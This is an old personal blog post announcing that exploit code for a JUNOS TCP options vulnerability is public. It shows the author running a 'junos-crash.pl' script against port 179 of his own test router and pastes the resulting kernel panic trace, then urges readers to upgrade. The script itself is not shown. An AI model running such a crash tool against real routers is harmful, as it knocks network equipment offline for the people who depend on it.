News Profile Code Photography Looking Glass Projects System Statistics Uncategorized
Present Location: News >> Blog >> JUNOS Exploit Out!

Blog
> JUNOS Exploit Out!
Posted by prox, from Charlotte, on January 09, 2010 at 22:51 local (server) time

We all saw the JUNOS PSN (and news stories) about the TCP options vulnerability in JUNOS.  Yep, now there's exploit code out there, and IT WORKS:

dax% sudo ./junos-crash.pl 10.3.4.35 179

Does this to one of my Olives:

stargazer (ttyd0)

login: 

Fatal trap 12: page fault while in kernel mode
fault virtual address   = 0x211
fault code              = supervisor read, page not present
instruction pointer     = 0x8:0xc032110a
stack pointer           = 0x10:0xc0836740
frame pointer           = 0x10:0xc0836770
code segment            = base 0x0, limit 0xfffff, type 0x1b
                        = DPL 0, pres 1, def32 1, gran 1
processor eflags        = interrupt enabled, resume, IOPL = 0
current process         = Idle
interrupt mask          = cam 
trap number             = 12
panic: page fault
panic(c0879c40,c0879c40,c07eb021,c0836624,5) at
panic(c07eb021,c,c0836770,c07d2141,0) at
trap_fatal(c0836700,211,c4213000,c08366ec,c02ff95e) at
trap_pfault(c0836700,0,211,0,c0836720) at
trap(10,10,10,c0836920,c0836848) at
calltrap() at
--- trap 0xc, eip = 0xc032110a, esp = 0xc0836740, ebp = 0xc0836770 ---
syncache_add(c0836848,c08368e8,c1b5a852,c08367ec,209,22,22,ac1d) at
tcp_input(209,a,3,4030a03,17) at

syncing disks... 
done
Uptime: 6d6h45m45s

Upgrade, upgrade!

> Add Comment

New comments are currently disabled for this entry.

XHTML 1.0 ValidCSS ValidRSS 2.0Powered by FreeBSDIPv4 This HTML for this page was generated in 0.000 seconds.